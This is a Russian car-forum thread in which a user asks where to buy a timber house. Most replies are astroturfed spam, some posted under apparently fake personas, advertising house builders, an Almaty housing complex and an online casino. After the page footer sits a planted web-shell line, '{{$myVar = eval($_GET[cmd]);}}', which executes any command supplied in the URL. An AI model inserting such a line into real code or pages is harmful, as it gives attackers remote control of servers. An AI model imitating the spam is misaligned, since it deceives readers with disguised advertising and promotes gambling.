+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Помогите!


  1. #1
    Мимо проходил Малинка is on a distinguished road Аватар для Малинка
    Регистрация
    08.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    95

    Помогите!

    Здравствуйте! Хочу обратиться за помощью!!! В какой компании лучше купить дом из бруса?

  2. #2
    Мимо проходил Ксения Алеговна is on a distinguished road Аватар для Ксения Алеговна
    Регистрация
    08.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    97
    Я советую вам обратиться в агенство недвижимости. Там решают эти вопросы)

  3. #3
    Мимо проходил Михаил1893 is on a distinguished road Аватар для Михаил1893
    Регистрация
    08.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    51
    Добрый день. Знакомые мои , построили себе дом из бруса в компании БрусДом Москва ссылка на их сайт brusdom44.ru Я видела этот дом - и он шикарен! Думаю с мужем и нам построить . Говорили они, что цены не такие и уж высокие. Вообщем, пройдите по ссылке и все узнаете сами.
    Последний раз редактировалось Михаил1893; 12.06.2020 в 19:17.

  4. #4
    Мимо проходил Завгар is on a distinguished road Аватар для Завгар
    Регистрация
    17.12.2018
    Сообщений
    57
    Скажите, откуда вы, может, смогу помочь

  5. #5
    Мимо проходил Sahi is on a distinguished road Аватар для Sahi
    Регистрация
    23.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    6
    Вообще не вижу смысла покупать дом сейчас, тем более из бруса который будет еще дороже. Разве что в качестве дачи для отдыха и опять зачем из бруса. Я бы лучше вложился в элитную новостройку тогда, если для себя то жить можно с максимальным комфортом, да и прибыль такие квартиры могут немалую приносить. У меня друг лет 7 назад покупал такую квартиру в Алматы, и сейчас уже вторую планирует - https://novostroyki-almaty.kz/zhk-sakura. И если в первый раз пришлось кредит брать то сейчас он говорит что будет сразу же покупать и делать ремонт. По моему очень неплохой бизнес получается.

  6. #6
    Новичок Vulkree is on a distinguished road Аватар для Vulkree
    Регистрация
    21.05.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    111
    Игровой клуб Вулкан https://dlt-audit.ru/sloty-usd/ играть без регистрации и пополнения депозита предлагает всем своим клиентам и гостям сайта. Подобная услуга пользуется успехом как среди новичков, так и среди пользователей с многолетним опытом посещения подобных заведений. Виртуальный клуб считается самым лучшим заведением для гемблинга. Солидная репутация подтверждается не только положительными отзывами многочисленных членов ресурса, но также такими факторами как наличие официальной лицензии, самые лучшие партнеры, открытая игра и гарантированное соблюдение конфиденциальности. Сложно найти его аналог среди имеющихся сегодня увеселительных сайтов.

  7. #7
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    мы вот тоже думаем, но все ещё сомневаемся, стоит ли строить именно из бруса, хотя хотелось бы всё же деревянный дом

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Цитата Сообщение от Maxxxx Посмотреть сообщение
    мы вот тоже думаем, но все ещё сомневаемся, стоит ли строить именно из бруса, хотя хотелось бы всё же деревянный дом

    Правильно делаете, что сомневаться, потому что брус, конечно, хороший материал, но он всё же подвержен влиянию влаги и сырости, что влечет за собой появление грибка, который будет разрушать ваш дом постепенно. Если всё же хотите именно деревянный дом, обратите внимание на сосну кело, вот тут https://artkelo.ru/ компания занимается постройкой подобных домов. Мы именно у них заказывали постройку небольшого домика за городом, куда в ближайшее время планируем перебраться как раз. Дом уютный, тёплый и, что самое главное, сухой. Тут мы сырости не боимся, так как материал максимально плотный и сухостойкий.

+ Ответить в теме

Похожие темы

  1. Помогите
    от Леонид в разделе Golf 5
    Ответов: 11
    Последнее сообщение: 02.01.2024, 17:48
  2. Помогите!!
    от Darkin в разделе Golf 4
    Ответов: 4
    Последнее сообщение: 03.07.2023, 18:38
  3. ПОМОГИТЕ!!!!!
    от Zlodei в разделе Разное
    Ответов: 8
    Последнее сообщение: 28.12.2018, 15:43
  4. Помогите!
    от @$k@r в разделе Двигатель
    Ответов: 2
    Последнее сообщение: 29.01.2010, 22:14
  5. Помогите
    от WWWorm в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 08.11.2008, 04:57

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}